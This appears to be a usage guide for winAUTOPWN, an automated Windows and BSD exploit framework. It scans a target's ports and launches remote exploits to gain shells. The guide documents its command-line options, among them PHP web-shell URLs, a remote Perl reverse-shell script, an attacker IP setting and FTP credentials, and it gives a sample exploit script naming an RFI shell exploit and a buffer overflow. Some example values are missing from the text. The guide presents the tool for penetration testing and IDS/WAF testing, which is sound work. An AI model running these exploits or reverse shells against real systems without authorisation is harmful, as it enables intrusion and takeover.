is a minimal Interactive Exploit Framework which acts as a frontend for quick systems vulnerability exploitation. It is a collection of remote exploits using which one can compromise vulnerable systems. winAUTOPWN takes inputs like IP address, Hostname, CMS Path, etc. and does a smart multi-threaded portscan for TCP ports 1 to 65535. Open ports are then recognized and exploits applicable to those ports are executed with the aim of gaining a remote shell or the ability to run remote commands in certain cases.
WINDOWS AUTOPWN or winAUTOPWN is an auto shell gaining // security penetration tool. It can also be used to test IDS, IPS and other monitoring sensors/softwares.
Besides the above, winAUTOPWN can also be used as an efficiency testing tool for Intrusion Detection Systems (IDS) and Web Application Filters (WAF). winAUTOPWN has a vast repository of exploits for various Operating systems like Microsoft Windows, Apple MAC OSX, Linux (various), BSD systems as well as for well-known services and daemon software. winAUTOPWN also contains a massive database of Shell Upload Vulnerability, Remote File Inclusion and Remote Command Execution exploits. These can be fired one after the other instantly and this can aide is checking if the WAF is preventing / alerting accordingly against such threats or no. Similarly shell aiming exploits too can be fired up in a row to test the strength and effectiveness of IDS and IPS.
WinAUTOPWN also has a BSD based cousin called bsdAUTOPWN. bsdAUTOPWN is a just like winAUTOPWN but is not an exact recompilation of winAUTOPWN. It has been written from scratch for and on FreeBSD OS to match the power and functionality offered by the Operating System. Like winAUTOPWN, even bsdAUTOPWN has a multi-threaded portscan feature and it too detects open ports and attempts to exploit them accordingly using the available exploits in the arsenal. We’ll come to a detailed discussion about bsdAUTOPWN later.
Windows GUI as well, which takes similar inputs and feeds it to the main winAUTOPWN console:
How to use command-line in winAUTOPWN ?
Command-line usage has always been a mark of a power user in any console based penetration testing tool. winAUTOPWN’s entire interactive interface can be pre-fed with values using command line options as explained below :- -skipscan This option can force winAUTOPWN to skip the port-scan module and use the file OpenPorts.TXT in the directory. This is a useful feature when you know what open ports are available on your target system. One can just fill in the port numbers and save the file. This is also helpful in situations when you want winAUTOPWN to check for exploits for one or a few particular ports.Example winAUTOPWN.exe –skipscan
- -onlyscan This option can force winAUTOPWN to skip the entire exploit testing modules. Hence, by using this module winAUTOPWN will only perform a PortScan and will exit after printing the list of OpenPorts .Example winAUTOPWN.exe –onlyscan
- -targetIP This option can be used to provide the Target IP address of the system being tested. Ensure that you specify the IP address after it.Example winAUTOPWN.exe –targetIP
- -targetHOST This option can be used to provide the Target Hostname of the system being tested. Ensure that you specify the complete Netbios name for Windows systems on LAN and the entire domain name for Target Systems on WAN.Example winAUTOPWN.exe –targetHOST SYSTEM-2
winAUTOPWN.exe –targetHOST - -attackerIP This option can be used to provide your own IP, which is the Attacker’s IP address of the system from where winAUTOPWN is being run. Ensure that you specify the IP address after it.Example winAUTOPWN.exe –attackerIP
- -cmsPATH This option can be used to specify the Content Management System directory name in the URL. Generally this is the first directory name right after the end of the Domain name or the IP address. Ensure that you specify the correct cmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.Example winAUTOPWN.exe –cmsPATH /xampp
- -actcmsPATH This option can be used to specify the Actual Content Management System or the internal Actual CMS Path of the URL. Generally this is not visible in the URL. A lot of times CMS packages installed on the webserver have a default path making it easily guessable. Ensure that you specify the correct actcmsPATH. You can leave this blank if you do not intend to test the web application vulnerability exploits.Example winAUTOPWN.exe –actcmsPATH /Applications/xampp
winAUTOPWN.exe –actcmsPATH /opt/xampp - -phpshellPATH This option can be used specify the path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. There is a default encoded PHP web-shell path. To change it, ensure that you specify the correct phpshellPATH which accepts a variable named CMD to execute system commands. The GET request should look like http://shellp.ath/shell.php?CMD=lsYou can leave this blank if you do not intend to test the web application vulnerability exploits.
Example winAUTOPWN.exe –phpshellPATH http://website.moc/folder/r57.txt - -actphpshellPATH This option can be used specify the actual internal path of the online PHP Web-shell which would be used along with the Remote File Inclusion Vulnerability Exploits. You can leave this blank if you do not intend to test the web application vulnerability exploits.Example winAUTOPWN.exe –actphpshellPATH /var/log/tmp
- -cmsadminUSR This option can be used specify the administrator /admin username if known. This is required for a few web-app exploits to work correctly. You can leave this blank if you do not intend to test the web application vulnerability exploits.Example winAUTOPWN.exe –cmsadminUSR admin9
- -ftpUSR This option can be used specify the FTP User name if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Username.Example winAUTOPWN.exe –ftpUSR user6
- -ftpPASSWD This option can be used specify the FTP Password if known. This is required for a few FTP exploits to work correctly. If you leave this blank winAUTOPWN will set an internal default FTP Password.Example winAUTOPWN.exe –ftpPASSWD S3cR37P@55W0rD
- -perlrevshURL This option can be used specify the path of a remote Perl script which should be able to send a /bin/sh or an equivalent shell to a remote IP. The script should ideally have the capability to be invoked as perlExample winAUTOPWN.exe –perlrevshURL http://website.moc/various/
- -mailFROM This option can be used to specify the sender’s email address to be used in a few SMTP exploits. This field has a default sender’s email address crafted by winAUTOPWN. It is always root@Example winAUTOPWN.exe –mailFROM
where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set. - -mailTO This option can be used specify the receiver’s email address to be used in a few SMTP Exploits. This field has a default receiver’s email address crafted by winAUTOPWN. It is always postmaster@Example winAUTOPWN.exe –mailTO
where target hostname is the –targetHOST provided earlier. You can set a value to this field to override the default value set. - -proxyIP This option can be used to provide the Proxy Server IP address. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy IP address after it.Example winAUTOPWN.exe –proxyIP
- -proxyPORT This option can be used to provide the Proxy Server Port Number. Do note that only a few exploits support Proxies and that too if you have supplied a Proxy IP and a Proxy port. Ensure that you specify the correct Proxy Port Number address after it.Example winAUTOPWN.exe –proxyIP 8080
What are the other WELF Scripting Terminologies?
can be , , OR (for exe files) is the filename of the Exploit. Ex: exploitname.exe is your Target’s IP address. Ex: is your IP. Ex: is the Target CMS Path. Ex: /awstats is the Actual CMS Path on the disk. Ex: /usr/home/www/awstats is an online URL for a php shell. Ex: is a admin username for the Target CMS. is FTP/CMS Username is FTP/CMS Password. is Proxy IP address to be used for some exploits to pass through is Proxy Port Number to be used for some exploits to pass through is the CMS Path with a trailing slah. Ex: /awstats/ is the typical complete address of the Target Hostname alongwith the CMS Path. Ex:< is the typical complete address of the Target Hostname alongwith the CMS Path with a trailing slash. Ex: is the CMS path following the standard http:// . Ex: is the Target HostName following the standard http:// . Ex:
Sample welf script (myWELFexploits.txt) with three exploits to be loaded:
PERL webframe_0.76_RFI(c99) -vuln-shell ^^^^
PYTHON Steamcast(HTTP_Request)_(SEH)_Rem_Buf_Ovrflw_xplt.py80 100 ^^^^ bitweaver_firecmd.exe ^^^^
To run the above script, as mentioned earlier run
winAUTOPWN.exe –welf myWELFexploits.txt
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